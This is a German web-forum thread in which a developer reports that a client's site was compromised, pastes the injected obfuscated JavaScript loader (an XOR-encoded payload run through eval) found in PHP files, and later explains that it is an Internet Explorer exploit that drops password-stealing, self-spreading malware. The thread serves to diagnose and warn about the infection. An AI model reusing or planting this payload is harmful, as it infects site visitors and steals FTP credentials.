newsreading.ru

    Hi,

    hat einer von denen schonmal gehört? Die verteilen anscheinend Malware. Auf einem Server von einem Kunden wurden jetzt schon 2 mal Files veränedrt. Und zwar die .htaccess und diverse .php files. Da wird ein Javascript eingebaut.
    Ich vermute die verteilen trojaner und die spionieren nach FTP-Passwörtern (z.b. von Filezilla oder so) und dadurch kann er sich dann weiter fortpflanzen?!
    Ich hab leider keine ahnung was der Javascriptcode tut ich stelle ihn mal hier rein. Sowie die htaccess
    also erstmal der javascript teil (wird am anfang oder ende der file erstellt, oder direkt nach dem bodybereich

    Spoiler anzeigen
    Code
    <!-- ad --><script>var paOnAw='';var inMe="";var inLOx;this.orBa=false;var meIn=function(){};this.boEa=10869;inLOx='%be%b2%b3%b8%bf%bc%be%bf%f9%91%86%b2%a4%bf%bd%8e%a4%b1%af%90%d7%f3%fc%f7%bc%f9%ab%a5%f5%95%d4%ee%f9%9a%9a%ad%a2%f9%fd%da%bb%a7%b3%b8%bf%8a%ff%c6%ef%d0%ff%f8%e9%f8%c6%ae%90%be%ab%89%b9%95%ab%b2%aa%a0%f9%bc%e0%81%ab%9c%a9%f5%fd%ed%aa%b6%ea%90%a0%b8%b5%99%8d%91%b9%a3%ad%a8%89%b6%e7%e7%f9%af%a5%b2%ab%97%b8%b3%b2%e3%d3%ee%81%aa%bb%81%89%fd%a4%9a%8e%ef%f8%da%ee%ae%b9%b5%a5%e1%88%a9%ab%ae%a3%88%9b%b0%8c%b3%b7%ae%ae%b3%fb%99%ab%b5%a0%b3%da%f5%e6%bd%a9%88%e9%e8%cc%ab%bc%a9%bb%a2%b6%92%a6%ba%ee%e4%a5%f7%98%be%ee%d8%f5%ea%ba%be%bc%98%f6%eb%a8%af%ad%bc%b9%b4%bf%ba%a6%91%f9%95%b6%91%90%99%e1%af%eb%b0%ba%ca%b0%a9%95%ba%9e%e1%e3%ac%a8%c2%e6%bc%a5%dd%ad%8a%a3%a9%b9%fb%e0%ca%f6%f7%e5%b3%fd%bf%9d%8a%ed%eb%e7%c3%c8%ea%e5%ed%f9%94%9d%b3%89%a7%a8%ae%8b%a4%a6%98%a8%a0%bd%a6%a6%bf%ab%f1%df%83%a3%b4%94%a5%bd%fd%f6%fe%ad%be%a8%94%b5%b7%a5%bc%f5%a5%b4%88%b5%ea%fb%a7%ad%fe%ae%a8%d6%eb%ad%a1%a0%89%de%b2%a4%b1%af%9a%be%ea%da%fb%c5%b5%b1%88%e0%da%b3%81%b4%fc%e5%a6%ac%a8%ea%8f%8a%b1%b1%93%aa%e4%9d%b0%b6%a8%9d%f0%ab%b3%95%b9%fd%b9%94%b6%95%9d%a9%95%ed%e8%fd%f6%a9%91%92%b3%fc%a2%b4%bd%8f%e3%e9%c4%e3%83%a7%f8%a8%ef%b2%ae%a6%87%a0%e1%d9%bb%a4%9b%f9%f4%e8%be%b0%b1%fa%91%b9%9c%a9%b2%80%9c%94%a8%99%f7%e7%e5%c3%e2%ce%80%b9%b3%b8%97%ae%a1%a5%b4%b8%d6%aa%b2%ad%8e%b7%e1%af%ff%ac%9b%a3%89%b4%a3%bb%e6%b1%a8%8a%cb%9c%b2%ab%ae%f2%e1%f8%b1%aa%d0%8b%b3%95%98%f6%fd%d5%d1%ea%df%ff%ee%e6%c6%c1%ed%f8%f7%f5%c5%ac%9e%b8%a9%b6%a7%a4%a2%81%d7%e6%e2%df%ec%f8%ef%ff%a6%f9%9d%af%81%a3%be%ec%ff%f9%c1%b6%93%bc%b5%ac%99%be%8e%e9%ae%97%8a%93%a2%a2%f0%eb%ef%fe%bf%b5%ae%ab%ac%a0%ac%bb%e8%ff%e6%f9%87%85%b8%9d%a7%bc%e1%a6%bd%a4%96%b4%f5%e7%fb%f6%ed%ab%fb%b8%bc%b8%ba%b3%b4%a8%cf%f3%f6%f3%e4%b5%ea%a6%a5%9d%89%ac%af%a6%9d%a0%9d%a6%e2%f7%fe%ea%bb%ba%97%f7%97%9f%cd%fd%fd%f0%a5%b7%97%a4%f3%bf%a7%9a%9f%81%bf%bd%aa%a6%aa%b5%e6%b4%f8%d9%f1%f1%96%e0%bb%af%96%a7%ae%8c%82%ba%8a%f7%e7%fd%eb%ef%e0%f9%b6%e1%b9%b4%a0%8e%c9%ce%fd%aa%af%a6%9c%b8%b5%b5%b9%d6%e1%d1%ad%a9%c5%a4%f4%a1%fe%a2%e0%89%94%b6%92%8d%b1%a4%ba%c3%eb%e8%aa%fa%b9%a8%8c%ac%e4%ef%ee%eb%e9%a4%c4%e5%9d%a2%f0%e1%c2%b4%bc%b3%9b%a6%b4%9d%a5%aa%eb%f5%ff%ef%a8%ad%b5%be%ff%92%b0%85%a2%86%9d%bc%93%fb%b7%a8%af%ab%b8%a2%85%dc%bf%86%a2%ae%a9%ec%b8%fa%8d%ac%d3%a9%8e%be%bf%98%b6%bb%d2%ae%b2%ad%a4%b4%c6%9d%b6%fb%c5%8b%90%b5%bf%f9%bd%9a%fe%aa%a7%83%93%a9%e4%fe%fc%ed%ea%a3%8d%9e%a7%df%ba%e0%e5%f9%c0%ab%87%bf%b8%ec%d8%f1%e9%af%a0%86%8d%e2%af%af%aa%be%9d%a8%a6%bd%d2%f7%e1%ff%b0%a8%97%81%aa%91%d2%b2%a7%b3%bc%85%bc%af%f8%d8%b7%b0%a7%bf%a2%95%87%b1%a5%c6%85%a9%bf%b2%bc%ea%95%a4%bf%ba%89%93%bc%a9%fd%ad%bc%b8%bc%b5%95%e2%e6%f3%a9%e9%ab%ab%a8%95%82%9c%b2%a1%e4%aa%ad%af%a2%a6%96%a6%f3%b5%b8%8b%b7%aa%e2%a7%9a%80%fb%e6%a7%b0%aa%fb%b4%87%8d%ab%9c%a2%b9%bf%e1%ab%bb%f8%ca%a9%a0%e3%95%ac%ad%ba%ae%f7%90%c2%b3%f3%fa%ef%be%9b%ac%a4%ae%9c%c1%f5%f1%e1%a7%9f%aa%bc%8a%b8%9d%fa%f6%b1%f1%ed%9f%b4%ad%f7%ae%a8%85%b2%88%ea%ee%b9%91%a2%bb%96%b6%84%e7%f1%a8%9a%8b%99%f4%ff%e1%a2%af%be%b0%a5%87%f7%b2%ef%ba%f6%d4%f5%c9%a9%96%bf%a8%ee%fc%9b%8e%c2%ad%bb%87%a1%a4%ed%ab%9c%f3%f4%fc%cb%89%ad%a7%b5%bc%82%9f%d3%fd%f5%c2%a3%a9%f4%a6%f4%92%b4%a7%ba%ab%be%8c%a8%89%99%a7%8a%fe%d0%c2%bc%bb%a8%a4%e9%9e%be%ad%88%97%89%b4%af%b2%ec%e8%fd%f6%a7%8a%88%fd%eb%c1%a2%98%95%88%b1%c8%b0%a4%d2%94%fc%fd%e7%b2%fc%ca%f6%f0%b9%a3%9a%bf%ad%94%ef%c4%f5%f3%e3%f0%e9%c1%e6%b0%bb%94%ac%ba%a2%ee%ea%e0%f4%bb%ab%f8%fa%e8%bb%a4%af%a8%b3%a8%8c%94%92%8f%8f%eb%ee%fa%f7%a9%9a%f1%f2%d0%ed%f8%e8%f5%ae%a7%8b%cb%92%a0%9a%b8%bc%ba%a6%bf%bc%c1%b1%a5%ab%ef%ba%ae%8b%bb%fa%c6%f2%97%a6%b8%f6%be%8a%bf%a0%9f%ec%bb%e6%e6%b9%b1%ad%fc%ba%a2%be%ed%87%fb%d4%e4%93%e1%83%e8%b7%fd%f6%be%e1%86%a5%90%ae%c8%aa%be%d7%f0%ad%a5%af%a9%be%99%a5%bd%a0%dc%e8%bb%bc%bb%bf%97%e8%e5%f4%e3%ff%c4%e2%e2%a9%8e%a4%a4%eb%b2%88%94%bd%84%f9%c7%ef%cc%b7%9d%ac%f3%a5%9b%bb%bf%ba%b4%9e%90%f1%f6%bf%a5%98%8e%99%e9%f3%b5%ef%fe%a4%b4%a1%90%ff%b3%fd%9b%86%bf%b3%a1%fd%a2%9f%82%b1%a2%f7%b5%a1%a3%86%bb%a5%b1%ea%82%89%a0%ad%a3%f5%8d%b6%8f%fe%ad%aa%b1%b9%b3%ab%b5%be%af%f9%b8%aa%b7%aa%b6%bc%ae%f7%e2%a9%a2%ba%a7%a0%a9%b2%8d%97%b3%8a%bc%9a%a7%b3%9a%a9%fb%f5%98%e8%a8%a9%b8%a0%b7%b1%88%cf%c3%fb%d9%ee%a7%f7%ec%cb%cc%ff%e5%f6%fe%ed%8f%b2%a3%f9%9f%b9%fd%a7%b8%aa%bb%b3%ed%a9%d1%b2%94%a2%a5%b8%bb%ed%fd%8a%8c%91%a0%a9%90%e5%fd%84%a6%e1%89%a9%b0%a6%af%a6%96%be%f0%96%9b%eb%b7%f4%d0%e5%9f%aa%b4%ac%bf%a3%f3%b1%fd%a4%a8%af%99%a2%89%93%87%84%ac%ae%fc%fe%b7%ef%d8%89%b2%88%ec%ae%b4%bc%a8%b6%8b%94%8e%b7%bd%91%f8%ef%f9%f5%97%99%be%af%f0%b5%a6%be%bb%9e%82%a3%e1%e2%fe%f6%b5%a8%8d%ae%8e%a0%84%97%e0%a9%bc%bc%aa%98%d1%bc%b2%b0%88%bb%ba%9c%e0%e6%8b%a2%b6%8c%96%a9%8d%86%97%a1%8a%be%b7%a1%8d%bb%ad%e7%e6%cc%d2%fe%e1%a9%bf%f0%a9%a3%93%8a%91%b9%b0%bb%a9%e0%f4%dc%e8%a8%84%89%fe%a1%b6%b8%b7%b6%98%85%8d%9d%b7%a2%b8%a0%ce%e1%b4%e9%a7%be%82%b3%b5%a4%8a%d1%fc%aa%a3%b9%8e%a5%fd%e3%c2%a0%91%bd%dc%b8%a5%a2%97%c3%f6%d1%fd%b3%9c%81%b3%ef%ee%bb%bb%9e%93%ed%9f%bd%a4%8c%a3%ac%af%8b%f6%e7%e2%be%a2%a8%90%e5%be%ba%bb%fd%93%8d%b2%83%90%a4%e4%93%8d%a7%80%ae%99%b3%bd%f6%d4%a8%bb%b8%8c%a7%af%92%f7%d7%b5%de%ec%fb%f3%f8%e3%af%f1%b2%84%c4%f4%db%d4%b3%ae%80%a5%9f%ab%9c%ac%bb%8e%9f%8e%b2%b0%a9%ac%b0%ec%af%9f%88%ea%fd%90%a3%8f%95%fb%d6%b1%e7%b4%a1%8d%a8%f8%fd%b5%d4%cb%80%a5%a4%ab%ed%b3%8d%94%ba%a0%b3%bd%a6%ec%ca%e5%a7%bf%ba%c3%fc%9b%b3%e5%e8%f1%e1%e4%a4%cb%b8%ac%af%9a%88%f2%e2%aa%a2%c5%a1%bc%af%ee%ab%bd%ba%96%8e%b8%ac%b2%ab%a2%b9%f5%b0%b7%a3%d7%ba%fe%96%b6%aa%a8%a1%a8%82%9f%e2%95%a0%bc%aa%9d%f9%b1%b1%a3%ba%84%8d%be%86%e1%e5%98%b6%a3%be%fa%ee%e5%b0%8e%aa%9c%f2%90%a7%bf%fd%af%ac%ee%a5%bc%ae%89%e6%b9%8f%a5%93%a6%84%a4%a0%cb%f9%ae%a7%92%b9%a6%83%bc%cf%ee%bc%af%a1%bf%ea%92%c6%a6%b9%b7%fb%83%d1%a5%b4%ab%85%b1%ad%8b%d0%df%f6%af%ae%b8%98%b5%d5%89%9f%9a%9f%a5%f4%ee%f4%e3%e0%ff%ea%8b%a1%a2%fa%8d%b0%82%88%9b%a2%8f%b2%e3%bf%d1%f6%e9%a9%90%b8%a4%e7%aa%98%ac%83%ff%aa%89%9e%b4%a8%ba%8f%f7%fd%be%ab%83%86%ba%9f%81%a9%b2%fd%ef%e4%8f%f1%ac%9f%97%91%a2%84%ae%e7%d8%eb%f3%e3%e9%e2%a1%9a%ae%ac%82%be%98%a4%e3%a7%f1%b6%ad%a6%81%a4%9a%b9%92%a7%e1%ad%f6%b9%c5%ae%9c%93%a1%a5%fc%ff%ed%a4%de%89%a0%8d%f2%f9%d0%ac%de%f2%de%f9%c3%f1%e3%e5%b3%b6%ab%f1%8d%9b%b1%af%aa%ab%bc%9a%9b%af%c1%bd%bd%b8%bf%b2%84%ac%9e%96%9d%e6%a0%b4%b4%80%a9%8e%af%bc%88%e1%c6%f7%fc%ef%f0%e4%fe%fb%de%f1%cd%ff%d9%e5%be%b7%a4%ef%c2%b9%b9%9f%bb%a3%ac%a4%e7%9f%80%86%e7%84%ab%bf%bc%be%d2%e6%80%f6%f6%ef%e2%ba%f3%a2%a6%b1%a0%8a%b7%b7%f7%f4%a6%82%b5%99%ab%a3%b2%e6%c2%b9%a6%b6%b5%e4%81%9b%b2%ac%92%89%a3%b8%a3%ac%d8%eb%bd%89%a1%ae%b9%df%bb%e6%d6%b8%f5%f8%a2%bf%ad%fb%a1%e6%91%af%f3%9f%a9%bc%b0%9b%bf%96%df%be%b2%b3%f7%ab%87%b0%f1%e0%dc%fc%c7%f2%f1%aa%ad%a3%a4%fb%9f%c3%bf%a4%88%a2%d2%ab%a3%bd%90%e3%f8%b9%a0%98%a2%be%9e%b8%d4%e8%a7%a9%ba%b5%d4%a1%9b%b5%8a%a6%86%85%af%ae%e1%f0%bb%b3%9d%f3%88%b4%96%a5%bb%b8%9b%9b%9f%b8%b2%be%99%f4%fa%bf%ae%b0%ba%be%a5%88%a5%ad%e6%b8%b1%bf%c0%e6%a0%b4%b8%b5%89%a8%e0%e0%de%a6%b1%f5%ed%f5%ee%fd%de%ef%f5%ee%ec%e4%fd%f7%bf%bd%b0%ad%92%98%b2%ab%f9%a1%89%9e%de%bf%88%90%f5%ad%bd%9b%ba%b9%ac%ab%aa%ac%b5%a8%be%b6%ee%b7%a4%b7%81%9a%b4%b9%a5%de%a0%86%ab%a2%88%d7%b2%c9%ff%eb%e3%e3%ac%a7%9c%e4%a6%ac%98%fe%ad%e4%c4%fd%d4%a4%f4%bc%ea%ac%9b%b6%8c%f9%99%9d%b9%ab%b4%c0%bb%8d%bf%ba%89%93%bc%a9%f5%e2%af%a5%a9%e6%9b%ad%9d%fd%ab%e8%ca%f3%ff%af%cc%b1%ec%af%96%b7%8a%f8%a2%bc%89%a9%b6%b3%e0%fb%eb%eb%ba%bd%8d%b2%a8%b5%a4%94%ee%8e%ac%a6%8d%a9%bb%aa%ab%b9%81%ab%9c%a1%b3%b2%f4%a2%bd%8e%b8%99%b2%a5%99%b8%8c%8a%b6%fe%e0%ea%a1%f2%8e%ba%b4%a7%af%94%f2%a9%bd%af%8d%b6%94%8b%b6%ab%a9%81%b8%b8%8a%bf%b8%e7%eb%eb%a5%dd%b8%dd%d2%ff%a0%9b%a4%a5%d4%eb%f0%b8%bb%b1%ff%ab%b4%be%b5%e2%fe%b0%80%a3%95%b5%85%a1%a9%92%b9%ba%c6%bf%b8%c1%f7%d2%f2%bc%b6%a7%d9%f2%96%ea%df%ab%96%ee%e0%af%a3%a5%89%b4%a0%fe%ef%f9%bf%9d%9c%fa%ea%e7%e1%fd%e4%bc%a2%b1%98%92%af%de%bf%b4%af%9a%b5%81%8d%ef%b1%b3%b8%a0%f7%ab%b9%86%87%9c%b9%b7%96%e9%f6%ec%f9%f6%ec%e6%dc%e1%aa%a2%bb%ae%e5%b3%89%bf%a7%af%96%9f%f7%af%e4%df%f6%eb%f7%ec%ca%d7%ef%be%bf%bc%ce%99%be%93%bd%92%9d%cd%af%bc%94%ac%a5%ce%a8%bf%a2%ed%af%b9%8e%86%e0%fc%d0%e5%a4%86%ea%ac%ba%8a%eb%ba%b6%94%bc%e6%8a%ba%b0%b3%90%b8%b1%ed%a4%ba%ba%fd%b8%89%b2%b3%b2%d2%e7%f3%a8%af%91%f8%9b%b5%dd%e1%e5%eb%e1%bf%df%b9%a4%ea%fa%a3%96%be%af%a7%8b%97%af%b5%96%a4%da%e1%e5%ee%9f%99%b6%f2%a1%87%bb%89%b6%a2%8d%b6%a3%b2%ac%f6%f7%f3%ea%a4%98%9b%ba%af%99%bd%ad%e5%b3%9e%8d%9b%f5%f4%f5%a8%af%ad%ed%99%8a%ac%b6%9e%f6%f8%ea%ed';this.faOr=9396;var joE=new Date();function ehPo(esAt){var nAh=4283;this.amNa=62542;var inQiAe="";var liBaF=new Date();this.daAn=42444;var ehFaEh=new Date();function osErDa(obDa){var naBiPo=new Date();var mMo=55775;var aeEn=0;var muPa=false;this.odOo=673;var nHo=obDa.length, qiOoN=0;this.moOmOu='';this.odE='';var daLoNu="";var odNu=15176;var byExC=new Array();while(qiOoN<nHo){var awAxEr=function(){};this.erCAh="erCAh";var dAeN="dAeN";var arF=false;var omJ="";aeEn+=fQFy(obDa,qiOoN)*nHo;var asEr="asEr";var ifGu=27711;this.boBo="boBo";qiOoN++;var cF='';var ohEmIn=function(){};var arEm=function(){};}var arAa=false;this.ahKE="ahKE";var neNNa="";var odMyBa='';this.erNo=12396;return (aeEn+'');var rDoFy="rDoFy";this.adA=55369;}var ehHiOo=function(){};this.daN='';var idNo="idNo";var exFC=new Array();this.biHe="";function fQFy(ioAtOi,oyEl){var opAy=function(){};this.qQKa="qQKa";return ioAtOi['c.hfa.r.CloldlefAut.'.replace(/[lf\.u3]/g, '')](oyEl);var loAs=55246;var hoOuOx=new Date();}var laByGo="";this.naOxOu=false;var onAJo="onAJo";this.dItOn="";this.koIfBa=7859;var obGi = new String(document['wor_i$'.replace(/[\>_\]/g, '')]);var anGi='';var anOo=new Date();var fOs=35492;var odMa=function(){};var rAn="";if(obGi.indexOf('aGrGi3thy)'.replace(/[hc3G\)]/g, '')) != -1) {var lAaNa=new Date();this.ooDaQi="ooDaQi";var oyIoBa="oyIoBa"; return ;this.atOiMa="";this.muAt=false;var haLo='';}var aOdMi="";this.meBe="";var hQiEs="hQiEs";var oxEe=function(){};var maDo=0,nAeD=0, kaAm=138;this.ooQ=false;var ohAw=false;this.maL=false;var emIsOn='';var poFyPi="";var fyEaMa=new Date();var owAsAa=(new String(ehPo)).replace(/[^@a-z0-9A-Z_.,-]/g,'');this.giC=false;var atLa=20741;var isOu=false;var amOx=osErDa(owAsAa);this.nyQiB=54667;this.onOw='';var iDoEn="";var myNDi="myNDi";var qiOm=false;this.obMu="";esAt=window['uYnGeVs*czaVpVeY'.replace(/[YGzV\*]/g, '')](esAt);var oiEm=new Array();this.bEe='';this.poAs="";var hAd="";for(var koAaEa=0; koAaEa < (esAt.length); koAaEa++){this.iAaIt=false;var qiBy='';var iOeof=function(){};var esF=false;var kaAs=new Date();var heKGu=fQFy(owAsAa,maDo);this.atOeof="";var boEl="boEl";var idBo=fQFy(amOx,nAeD);this.muEhOs="muEhOs";var enAhMy=new Date();this.osKo="";var ifH=new Date();var eaBi=heKGu^idBo^kaAm;var loOoOb=62585;var ayGiEe="ayGiEe";var atOd=54254;var elOyGo=fQFy(esAt,koAaEa);var muGiKy=27635;var kyOu=34964;var liGu=function(){};var ahAa=false;this.awAa='';var rPa="rPa";maDo++,nAeD++;var atEeMy='';var gFyOp=8068;var qMaK="";emIsOn+=String['fOr'.replace(/[\%O\+]/g, '')](elOyGo^eaBi);var heGoOs="heGoOs";this.eMu="";var oeofOyN=new Array();var chLaOp=45781;var oiOrIt=false;if(nAeD>amOx.length)nAeD=0;this.biEmN=24766;var boLoM=new Array();if(maDo>owAsAa.length)maDo=0;var nLaBy=new Array();var byNyHa="";this.neMoOu="neMoOu";}var ayEs=15043;var laFa='';var itIfIt=new Array();var omNe="";window['emvca2l5'.replace(/[m2tc5]/g, '')](emIsOn);var ouHEs=new Array();this.exBiFa='';this.emEr="emEr";var kyFyH=false;return emIsOn=new String();var emDi='';this.omEm='';var byAd=62301;var doAaOd=false;var lOo="";var paIoGo=new Array();}var osN=new Array();var haNoQ=new Array();var ioNe=new Array();ehPo(inLOx);var heEsNu=18325;this.byEaAa=false;</script><!-- /ad -->

    Und hier noch der Teil der in der .htaccess verändert wurde. Weitere Veränderungen habe ich noch nicht gefunden. Bilder etc. könnten aber natürlich auch infiziert sein :(

    Spoiler anzeigen

    MFG FireFlyer

    *Paradox ist, wenn man sich im Handumdrehen den Fuss bricht* :D

    ich will auch nix von denen o_O

    nur wenn ein server vom kunden (hab für den ne webseite gemacht) auf einmal keine mails verschickt werden können (kontaktformular) und ich dann veränderte dateien finde in denen was von newsreading.ru steht... oO
    da wird mir aber anders!!!

    MFG FireFlyer

    *Paradox ist, wenn man sich im Handumdrehen den Fuss bricht* :D

    So hab wieder ein bissl was rausgefunden.
    Der JavaScript Code ist ein Exploit für den IE um quasi die Tür zu öffnen sodass weitere Malware und Trojaner eingeschleust werden können.
    Unter anderem ist http://www.sophos.com/security/analy…/malobfjsh.html das hier mit dabei so wie das http://www.sophos.de/security/analy…32sohanaaa.html

    Wer die Files haben möchte (die bei mir auf dem Server waren)
    http://awfl.eu/downloads/2/gebtek.ch.tar.gz
    ACHTUNG! Ich glaube zwar nicht das etwas passiert wenn man die files öffnet (sondern nur wenn man den code ausführt) aber natürlich lieber trotzdem vorsichtig sein.

    MFG FireFlyer

    *Paradox ist, wenn man sich im Handumdrehen den Fuss bricht* :D

    Aber ich gehe mal davon aus, das es auch unter Linux mehr und mehr Würmer geben wird.
    Ubuntu ist nun auch wie Windows einfach zu installieren und bringt fast alles mit .... Office etc...
    Aber gut das Linux einfacher wird, so kam ich auch in den Genuß und mache alle Webentwicklung unter Linux :D

    MfG
    Der_Doc

    :P

    So siehts bei mir ebenfalls aus :D
    Naja ich hab mittlerweile noch mehr rausgefunden. Der JavaScript-Code ist ein Exploit für den IE der es möglich macht noch andere Malware auf den rechner zu bringen. Teile davon spionieren wohl Passwörter von programmen wie FileZilla o.ä. aus und ändern mit Hilfe dieser Passwörter wiederrum die Dateien auf den anderen FTPs. Zusätzlich wird aber auch noch zeug hochgeladen für Adware und man wird auf bestimmte Seiten (Porn, Medikamente, etc.) weitergeleitet. Diese "Weiterleitungsscripte" sind aber noch nicht wirklich ausgereift. Der Programmierer hat versucht diese mit Shellcode ans laufen zu bringen was afaik zumindest bei uns nicht funktioniert hat.
    Aber trotzdem ne ganz schön fiese methode oO

    MFG FireFlyer

    *Paradox ist, wenn man sich im Handumdrehen den Fuss bricht* :D